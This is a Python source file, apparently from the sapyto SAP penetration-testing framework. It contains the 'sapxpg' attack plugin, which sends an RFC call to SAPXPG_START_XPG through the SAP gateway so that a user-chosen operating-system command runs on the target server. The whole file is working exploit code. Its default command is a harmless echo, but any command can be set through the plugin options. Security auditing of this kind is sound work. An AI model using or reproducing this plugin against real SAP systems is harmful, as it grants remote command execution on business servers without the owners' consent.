# -*- coding: latin-1 -*-
'''
sapxpg.py

Copyright 2007 Mariano Nuez Di Croce @ CYBSEC

This file is part of sapyto, http://www.cybsec.com/EN/research/tools/sapyto.php

sapyto is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

sapyto is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with sapyto; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
'''
import core.sapytoCore as core
from core.basePlugins.basePlugin import basePlugin
import core.kb.knowledgeBase as kb
import core.output.outputManager as om
import plugins.audit.checkSapxpg as audit
import saprfcutil
from saprfc import *
from core.misc import *
import re
import copy

class sapxpg(basePlugin):
	'''
	Executes remote operating system commands if sapxpg is enabled.
	
	@author: Mariano Nuez Di Croce <mnunez@cybsec.com>
	'''
	def __init__(self):
		basePlugin.__init__( self )
		self._iface = None
		self._params = ''
		self._targets = {'RFCSYSID':['^\w{3}$']}
		self._gwhost = 'Current target'
		self._gwserv = 'sapgw00'		
		self._tpname = 'sapxpg'
		self._cmd = 'cmd.exe /c echo sapyto is here'
		self._checkFirst = 1
		
	def run( self ):
		om.out.information('Starting \'sapxpg\' attack plugin.')
		om.out.information('Checking Target Information: ', newLine=False)
		if core.sCore.validateTargets(self._targets):
			om.out.information('OK')
		else:
			om.out.information('Not in plugin \'targets\' list. Plugin may fail.')
		
		self._iface = iface('SAPXPG_START_XPG')				
		ep_cmd = parm( 'EXTPROG', '', RFCEXPORT, RFCTYPE_CHAR, len(self._cmd), 0, self._cmd)
		ep_params = parm( 'PARAMS', '', RFCEXPORT, RFCTYPE_CHAR, len(self._params), 0, self._params)		
		ep_cntl1 = parm( 'STDINCNTL', '', RFCEXPORT, RFCTYPE_CHAR, 1, 0, 'N')		
		ep_cntl2 = parm( 'STDOUTCNTL', '', RFCEXPORT, RFCTYPE_CHAR, 1, 0, 'N')		
		ep_cntl3 = parm( 'STDERRCNTL', '', RFCEXPORT, RFCTYPE_CHAR, 1, 0, 'N')
		#ep_cntl4 = parm( 'TERMCNTL', '', RFCEXPORT, RFCTYPE_CHAR, 1, 0, 'N')
		#ep_cntl5 = parm( 'TRACECNTL', '', RFCEXPORT, RFCTYPE_INT, 4, 0, 0)
		ep_cntl6 = parm( 'LOG', '', RFCTABLE, RFCTYPE_CHAR, 80)
		self._iface.addParm(ep_cmd)
		self._iface.addParm(ep_params)
		self._iface.addParm(ep_cntl1)
		self._iface.addParm(ep_cntl2)
		self._iface.addParm(ep_cntl3)
		#self._iface.addParm(ep_cntl4)
		#self._iface.addParm(ep_cntl5)
		self._iface.addParm(ep_cntl6)
		
		if self._gwhost == 'Current target':
			sysid = kb.kb.getData('sapinfo','systeminfo')['RFCSYSID']
			if re.compile('\(extern\)').match(sysid):
				# If we are analyzing a registered server, we verify its gateway!
				gw = self._conn.gwhost
			else:
				gw = self._conn.ashost
		else:
			gw = self._gwhost
		
		self._conn = conn(gwhost = gw, gwserv= self._gwserv, type = 'E', tpname = self._tpname)
		
		# Use audit plugin checkSapxpg
		if self._checkFirst == 1:
			if not kb.kb.getData( 'checkSapxpg', 'called'):
				au = audit.checkSapxpg()
				au.setConn(copy.deepcopy(self._conn))
				# Set Options for checkSapxpg
				# Ugly!
				au.setGwhost(gw)
				au.setGwserv(self._gwserv)
				conn2 = au.run()
			# Get the first (probably the only) tpname
			res = kb.kb.getData( 'checkSapxpg', 'tpname')
			if res:
				self._conn = conn2
		
		om.out.information('\tTrying to connect...')
		try:
			if not res:
				self._checkConnection()
		except sapytoException:
			om.out.information('\tCould not connect with ' + self._conn.tpname)
		try:
			if not saprfcutil.call_receive( self._conn, self._iface ):
				raise sapytoException('Could not perform RFC call.')
			om.out.information('\tCommand \'' + self._cmd + ' ' + self._params + '\' was sent successfully.')
			self._conn.close()
		except TypeError, e:
			self._conn.close()
		om.out.information('Plugin \'sapxpg\' finished.')
			

	def getOptionsXML(self):
		'''
		This method returns a XML containing the Options that the plugin has.
		Using this XML the framework will build a window, a menu, or some other input method to retrieve
		the info from the user. The XML has to validate against the xml schema file located at :
		sapyto/core/ui/userInterface.dtd
		
		@return: XML with the plugin options.
		'''	
		return	'<?xml version="1.0" encoding="ISO-8859-1"?>\
		<OptionList>\
			<Option name="gwhost">\
				<default>Current target</default>\
				<desc>Gateway host.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="gwserv">\
				<default>sapgw00</default>\
				<desc>Gateway service</desc>\
				<type>String</type>\
			</Option>\
			<Option name="tpname">\
				<default>sapxpg</default>\
				<desc>TPname of sapxpg server.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="command">\
				<default>cmd.exe</default>\
				<desc>Command to run.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="parameters">\
				<default>/c echo sapyto is here</default>\
				<desc>Command parameters.</desc>\
				<type>String</type>\
			</Option>\
			<Option name="checkFirst">\
				<default>1</default>\
				<desc>Checks availability of Rfcexec.</desc>\
				<type>String</type>\
			</Option>\
		</OptionList>\
		'

	def setOptions( self, OptionList ):
		'''
		This method sets all the options that are configured using the user interface 
		generated by the framework using the result of getOptionsXML().
		
		@parameter OptionList: A dictionary with the options for the plugin.
		@return: No value is returned.
		'''	
		if 'gwhost' in OptionList.keys(): 
			self._gwhost = OptionList['gwhost']
		if 'gwserv' in OptionList.keys(): 
			self._gwserv = OptionList['gwserv']
		if 'tpname' in OptionList.keys(): 
			self._tpname = OptionList['tpname']
		if 'command' in OptionList.keys(): 
			self._cmd = OptionList['command']
		if 'parameters' in OptionList.keys(): 
			self._params = OptionList['parameters']
		if 'checkFirst' in OptionList.keys(): 
			self._checkFirst = OptionList['checkFirst']
		
